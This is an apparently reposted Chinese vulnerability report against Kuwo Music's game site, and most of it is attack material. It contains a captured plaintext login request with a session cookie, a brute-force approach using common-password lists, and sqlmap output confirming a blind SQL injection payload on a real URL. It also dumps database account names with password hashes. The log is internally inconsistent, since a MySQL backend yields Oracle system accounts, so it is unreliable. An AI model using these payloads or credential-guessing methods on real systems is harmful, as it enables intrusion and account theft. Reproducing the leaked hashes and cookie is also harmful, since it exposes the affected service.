热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

酷我音乐主站某系统登陆处不当可导致爆破需修复接口(已出案例&分站一处SQL注入)网站安全分享!

RTRT酷我音乐主站某系统登陆处不当可导致爆破已出案例+&分站一处SQ


RTRT
酷我音乐主站某%ignore_a_1%登陆处不当可导致爆破已出案例+&分站一处SQL注入+敏感信息泄露

WooYun: 酷我音乐www主站存在SQL一枚Root权限

第二发

酷我音乐主站某系统登陆处不当可导致爆破需修复接口(已出案例&分站一处SQL注入)

 

http://game.kuwo.cn/g/st/NewerIndex_2014

登陆处

http://game.kuwo.cn/g/st/WulinLogin

用户名:

密 码:

验证码:

忘记密码

看了下

竟然是明文传输

看下数据返回结果

POST /g/st/WulinLogin HTTP/1.1

Host: game.kuwo.cn

Proxy-Connection: keep-alive

Content-Length: 65

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://game.kuwo.cn

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36 2345Explorer/6.5.0.11018

Content-Type: application/x-www-form-urlencoded

Referer: http://game.kuwo.cn/g/st/WulinLogin

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8

COOKIE: JSESSIOnID=318C7DF8B77199FAFBC38546A5126295.jvm1; mzcgid=108; mzcuid=kwg_581878826_mzc; mzcsid=326; mzcguid=581878826; gadtype=""; gadposition=""; Hm_lvt_cdb524f42f0ce19b169a8071123a4797=1451385640,1451446566,1452392626,1453428937; Hm_lpvt_cdb524f42f0ce19b169a8071123a4797=1453957944; Hm_lvt_cdb021f3257f215ddc622af5e5b503a5=1453958461; Hm_lpvt_cdb021f3257f215ddc622af5e5b503a5=1453958461; rec_usr=1453958461525x893_0_1453958461525; r3=y; __utmt=1; __utma=18026403.1373377312.1453958462.1453958462.1453958462.1; __utmb=18026403.1.10.1453958464; __utmc=18026403; __utmz=18026403.1453958462.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); www_game_popup=show_www_game

fromwhere=wulin&username=24324353&password=123456&code=DCOA&tm=50

明文传输的

爆破下居然出来了辣么多用户名密码

密码就用123456

之后用TOP500和1000跑

案例登陆:

 

酷我音乐主站某系统登陆处不当可导致爆破需修复接口(已出案例&分站一处SQL注入)

 

酷我音乐主站某系统登陆处不当可导致爆破需修复接口(已出案例&分站一处SQL注入)

 

酷我音乐主站某系统登陆处不当可导致爆破需修复接口(已出案例&分站一处SQL注入)

附赠一枚注入

sqlmap/1.0-dev – automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 13:13:15

[13:13:15] [INFO] testing connection to the target url

[13:13:15] [INFO] testing if the url is stable, wait a few seconds

[13:13:16] [INFO] url is stable

[13:13:16] [INFO] testing if GET parameter 'id' is dynamic

[13:13:17] [WARNING] GET parameter 'id' appears to be not dynamic

[13:13:17] [WARNING] reflective value(s) found and filtering out

[13:13:17] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)

[13:13:17] [INFO] testing for SQL injection on GET parameter 'id'

[13:13:17] [INFO] testing 'AND boolean-based blind – WHERE or HAVING clause'

[13:13:19] [INFO] GET parameter 'id' is 'AND boolean-based blind – WHERE or HAVING clause' injectable

[13:13:19] [INFO] testing 'MySQL >= 5.0 AND error-based – WHERE or HAVING clause'

[13:13:19] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[13:13:19] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..

[13:13:19] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y

[13:13:24] [INFO] testing 'MySQL UNION query (NULL) – 1 to 20 columns'

[13:13:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found

[13:13:30] [INFO] testing 'Generic UNION query (NULL) – 1 to 20 columns'

[13:13:35] [INFO] checking if the injection point on GET parameter 'id' is a false positive

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y

sqlmap identified the following injection points with a total of 55 HTTP(s) requests:

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind – WHERE or HAVING clause

Payload: id=32 AND 5283=5283

[13:13:38] [INFO] testing MySQL

[13:13:39] [INFO] confirming MySQL

[13:13:40] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.2

[13:13:40] [WARNING] HTTP error codes detected during testing:

500 (Internal Server Error) – 48 times

[13:13:40] [INFO] fetched data logged to text files under 'C:Usersdell-pcAppDataLocalTempHZ$D07~1.789HZ$D07~1.790SQLMAP~1Binoutputh.kuwo.cn'

[*] shutting down at 13:13:40

sqlmap/1.0-dev – automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 13:13:54

Usage: C:Usersdell-pcAppDataLocalTempHZ$D07~1.789HZ$D07~1.790SQLMAP~1BinSqlMap.exe [options]

SqlMap.exe: error: no such option: –current-dbs

Press Enter to continue…

[*] shutting down at 13:13:55

sqlmap/1.0-dev – automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 13:14:11

[13:14:12] [INFO] resuming back-end DBMS 'mysql'

[13:14:12] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind – WHERE or HAVING clause

Payload: id=32 AND 5283=5283

[13:14:12] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL 5

[13:14:12] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) columns

[13:14:12] [INFO] fetching current database

password hash: DF02A496267DEE66

[*] MDSYS [1]:

password hash: 72979A94BAD2AF80

[*] MGMT_USER [1]:

password hash: NULL

[*] MGMT_VIEW [1]:

password hash: 9C06E0B8DEF1E2E4

[*] OEM_ADVISOR [1]:

password hash: NULL

[*] OEM_MONITOR [1]:

password hash: NULL

[*] OLAP_DBA [1]:

password hash: NULL

[*] OLAP_USER [1]:

password hash: NULL

[*] OLAPI_TRACE_USER [1]:

password hash: NULL

[*] OLAPSYS [1]:

password hash: 3FB8EF9DB538647C

[*] ORACLE_OCM [1]:

password hash: 5A2E026A9157958C

[*] ORDPLUGINS [1]:

password hash: 88A2B2C183431F00

[*] ORDSYS [1]:

password hash: 7EFA02EC7EA6B86F

[*] OUTLN [1]:

password hash: 4A3BA55E08595C81

[*] PUBLIC [1]:

password hash: NULL

[*] RECOVERY_CATALOG_OWNER [1]:

password hash: NULL

[*] RESOURCE [1]:

password hash: NULL

[*] SAAS14 [1]:

password hash: 0A7CEE43CA9CDE53

[*] SAAS15 [1]:

password hash: 3B0F1AB62BEF8FCE

[*] SAAS16 [1]:

password hash: 79BFF7EAE1080B04

[*] SAAS17 [1]:

password hash: 1B1DDC04432422FC

[*] SAAS18 [1]:

password hash: 1AA2D42C90EE3503

[*] SAAS19 [1]:

password hash: F4AA6D4F8A52CBCE

[*] SAAS20 [1]:

password hash: CF03BEE15E16B003

[*] SCHEDULER_ADMIN [1]:

password hash: NULL

[*] SELECT_CATALOG_ROLE [1]:

password hash: NULL

[*] SI_INFORMTN_SCHEMA [1]:

password hash: 84B8CBCA4D477FA3

[*] SYS [1]:

password hash: A3D298F6BB7BFA37

[*] SYSMAN [1]:

password hash: 9E54353A9E15CC0D

[*] SYSTEM [1]:

password hash: 097317F2082C6682

[*] TSMSYS [1]:

password hash: 3DF26A8B17D0F29F

[*] WM_ADMIN_ROLE [1]:

password hash: NULL

[*] WMSYS [1]:

password hash: 7C9BA362F8314299

[*] WOYODEV [1]:

password hash: NULL

[*] XDB [1]:

password hash: 88D8364765FCE6AF

[*] XDBADMIN [1]:

password hash: NULL

[*] XDBWEBSERVICES [1]:

password hash: NULL

解决方案:

修复接口
 

www.dengb.comtruehttp://www.dengb.com/wzaq/1109242.htmlTechArticle酷我音乐主站某系统登陆处不当可导致爆破需修复接口(已出案例分站一处SQL注入) RTRT 酷我音乐主站某系统登陆处不当可导致爆破已出案…

—-想了解更多的网站安全相关处理怎么解决关注<编程笔记>


推荐阅读
  • 在PHP中如何正确调用JavaScript变量及定义PHP变量的方法详解 ... [详细]
  • 网站访问全流程解析
    本文详细介绍了从用户在浏览器中输入一个域名(如www.yy.com)到页面完全展示的整个过程,包括DNS解析、TCP连接、请求响应等多个步骤。 ... [详细]
  • 解决Bootstrap DataTable Ajax请求重复问题
    在最近的一个项目中,我们使用了JQuery DataTable进行数据展示,虽然使用起来非常方便,但在测试过程中发现了一个问题:当查询条件改变时,有时查询结果的数据不正确。通过FireBug调试发现,点击搜索按钮时,会发送两次Ajax请求,一次是原条件的请求,一次是新条件的请求。 ... [详细]
  • 在CentOS 7环境中安装配置Redis及使用Redis Desktop Manager连接时的注意事项与技巧
    在 CentOS 7 环境中安装和配置 Redis 时,需要注意一些关键步骤和最佳实践。本文详细介绍了从安装 Redis 到配置其基本参数的全过程,并提供了使用 Redis Desktop Manager 连接 Redis 服务器的技巧和注意事项。此外,还探讨了如何优化性能和确保数据安全,帮助用户在生产环境中高效地管理和使用 Redis。 ... [详细]
  • 技术分享:使用 Flask、AngularJS 和 Jinja2 构建高效前后端交互系统
    技术分享:使用 Flask、AngularJS 和 Jinja2 构建高效前后端交互系统 ... [详细]
  • 本文详细介绍了Java代码分层的基本概念和常见分层模式,特别是MVC模式。同时探讨了不同项目需求下的分层策略,帮助读者更好地理解和应用Java分层思想。 ... [详细]
  • 深入解析HTML5字符集属性:charset与defaultCharset
    本文将详细介绍HTML5中新增的字符集属性charset和defaultCharset,帮助开发者更好地理解和应用这些属性,以确保网页在不同环境下的正确显示。 ... [详细]
  • Python 数据可视化实战指南
    本文详细介绍如何使用 Python 进行数据可视化,涵盖从环境搭建到具体实例的全过程。 ... [详细]
  • 本文最初发表在Thorben Janssen的Java EE博客上,每周都会分享最新的Java新闻和动态。 ... [详细]
  • 本文详细介绍了 InfluxDB、collectd 和 Grafana 的安装与配置流程。首先,按照启动顺序依次安装并配置 InfluxDB、collectd 和 Grafana。InfluxDB 作为时序数据库,用于存储时间序列数据;collectd 负责数据的采集与传输;Grafana 则用于数据的可视化展示。文中提供了 collectd 的官方文档链接,便于用户参考和进一步了解其配置选项。通过本指南,读者可以轻松搭建一个高效的数据监控系统。 ... [详细]
  • 在JavaWeb开发中,文件上传是一个常见的需求。无论是通过表单还是其他方式上传文件,都必须使用POST请求。前端部分通常采用HTML表单来实现文件选择和提交功能。后端则利用Apache Commons FileUpload库来处理上传的文件,该库提供了强大的文件解析和存储能力,能够高效地处理各种文件类型。此外,为了提高系统的安全性和稳定性,还需要对上传文件的大小、格式等进行严格的校验和限制。 ... [详细]
  • MySQL Decimal 类型的最大值解析及其在数据处理中的应用艺术
    在关系型数据库中,表的设计与SQL语句的编写对性能的影响至关重要,甚至可占到90%以上。本文将重点探讨MySQL中Decimal类型的最大值及其在数据处理中的应用技巧,通过实例分析和优化建议,帮助读者深入理解并掌握这一重要知识点。 ... [详细]
  • CentOS 7 中 iptables 过滤表实例与 NAT 表应用详解
    在 CentOS 7 系统中,iptables 的过滤表和 NAT 表具有重要的应用价值。本文通过具体实例详细介绍了如何配置 iptables 的过滤表,包括编写脚本文件 `/usr/local/sbin/iptables.sh`,并使用 `iptables -F` 清空现有规则。此外,还深入探讨了 NAT 表的配置方法,帮助读者更好地理解和应用这些网络防火墙技术。 ... [详细]
  • MySQL的查询执行流程涉及多个关键组件,包括连接器、查询缓存、分析器和优化器。在服务层,连接器负责建立与客户端的连接,查询缓存用于存储和检索常用查询结果,以提高性能。分析器则解析SQL语句,生成语法树,而优化器负责选择最优的查询执行计划。这一流程确保了MySQL能够高效地处理各种复杂的查询请求。 ... [详细]
  • 您的数据库配置是否安全?DBSAT工具助您一臂之力!
    本文探讨了Oracle提供的免费工具DBSAT,该工具能够有效协助用户检测和优化数据库配置的安全性。通过全面的分析和报告,DBSAT帮助用户识别潜在的安全漏洞,并提供针对性的改进建议,确保数据库系统的稳定性和安全性。 ... [详细]
author-avatar
讨厌上学的-彭志超-_354
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有